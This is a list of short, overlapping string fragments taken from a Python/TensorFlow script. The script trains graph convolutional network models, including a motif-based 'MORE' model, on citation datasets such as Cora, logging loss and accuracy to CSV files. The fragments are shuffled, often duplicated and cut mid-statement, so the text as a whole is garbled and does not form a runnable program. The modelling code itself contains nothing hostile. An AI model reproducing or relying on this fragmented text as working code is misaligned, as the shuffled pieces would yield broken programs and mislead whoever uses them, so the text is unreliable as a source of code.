"train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders)",
"test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\",",
"'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize",
"= 1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] #",
"model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch in",
"k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59]",
"'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper",
"motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test",
"temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]]",
"test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in",
"3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden',",
"== 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func =",
"[], [] train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime",
"with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with",
"= { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures':",
"Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags",
"layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif",
"f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for",
"'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32)",
"'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby',",
"num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for model: '",
"matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number",
"'%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc),",
"in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration",
"else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders",
"to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight",
"for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden",
"in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None,",
"outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc,",
"import division from __future__ import print_function import time import tensorflow as tf import",
"in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"import winsound from Code_utils import * from Code_models import GCN, MLP, MORE #---------------------------",
"labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask,",
"# Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__",
"keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30,",
"- test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\",
"print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc =",
"flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of",
"i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound",
"placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val",
"for model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32)",
"hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of",
"---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags",
"[256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer",
"--------------------------# from __future__ import division from __future__ import print_function import time import tensorflow",
"[preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support =",
"= time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate,",
"#--------------------------- main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed)",
"L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of",
"= 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000,",
"return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = []",
"range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct feed dictionary",
"epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time",
"motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders)",
"test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost),",
"from Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main process",
"Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], []",
"mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc:",
"# Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost,",
"model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val,",
"= [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch",
"# Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [],",
"Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout})",
"train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss:",
"= GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports",
"np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc",
"# Not used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE':",
"of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3,",
"f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600 # Hz",
"units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6,",
"hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim",
"t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost)",
"with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost,",
"y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse",
"test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch >",
"as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i))",
"0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss",
"= {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as",
"t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val =",
"train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures",
"i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\",
"Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for",
"t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [],",
"used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support =",
"shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32),",
"and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() -",
"cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost)",
"batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001,",
"6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of",
"import print_function import time import tensorflow as tf import winsound from Code_utils import",
"adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some",
"for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 #",
"[32, 64, 128, 256, 512] mode_list = [] for i in range(0, 4):",
"use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003,",
"flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev",
"[lr[i], le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]] for",
"GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 +",
"model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time()",
"placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) #",
"str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i",
"> np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime #",
"print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2,",
"' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _",
"test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch",
"number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding')",
"[0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\",",
"motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict)",
"support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1],",
"{ 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32,",
"mode_list = [] for i in range(0, 4): temp1 = [lr[i], le[i]] for",
"process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings",
"flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer',",
"in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2",
"# 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE'",
"\"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time()",
"== 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func =",
"dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding')",
"import tensorflow as tf import winsound from Code_utils import * from Code_models import",
"[\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list = []",
"tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero':",
"\"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN'",
"# Function: Run training #-------------------------- import package --------------------------# from __future__ import division from",
"shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } #",
"results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost),",
"FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) #",
"string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense',",
"elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1",
"= [], [], [] train_loss, val_loss, Tloss = [], [], [] # Train",
"Run training #-------------------------- import package --------------------------# from __future__ import division from __future__ import",
"stop_epoch = epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support,",
"model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for",
"'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number",
"= [] for i in range(0, 4): temp1 = [lr[i], le[i]] for j",
"__future__ import division from __future__ import print_function import time import tensorflow as tf",
"# Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test",
"0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"]",
"for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with",
"motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i))",
"train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders)",
"30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden",
"= time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss,",
"random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS",
"model_func = MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) #",
"rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1",
"for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units",
"temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode)",
"f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') #",
"num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj,",
"tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32),",
"1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif",
"(epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time()",
"embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method",
"test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]):",
"Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break",
"val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]),",
"outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init",
"range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])),",
"'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE",
"= 1 model_func = MORE else: raise ValueError('Invalid argument for model: ' +",
"time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime",
"# Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden),",
"print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\",",
"0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\",",
"string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500,",
"== 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func =",
"\"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr",
"\"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time()",
"5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early",
"<NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from",
"= mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features,",
"support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\",",
"in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] #",
"\"Connection\"] la = [32, 64, 128, 256, 512] mode_list = [] for i",
"\"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr =",
"val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures =",
"y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss,",
"of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim',",
"for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond",
"500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128,",
"= evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results",
"outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc,",
"val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [], [], []",
"# helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model",
"test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders)",
"\"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t)",
"Author: <NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------#",
"- t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc =",
"la = [32, 64, 128, 256, 512] mode_list = [] for i in",
"print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with",
"embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False",
"mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time,",
"tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero':",
"Tacc = [], [], [] train_loss, val_loss, Tloss = [], [], [] #",
"# Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess =",
"# batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01,",
"polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden",
"dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), #",
"j in range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0,",
"outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration",
"sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True)",
"stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch",
"sess = tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask,",
"np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset",
"evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc),",
"[], [], [] # Train model train_starttime = time.time() train_time_list = [] stop_epoch",
"mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data",
"shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for",
"# Initialize session sess = tf.Session() # Define model evaluation function def evaluate(features,",
"in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct feed",
"= [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list =",
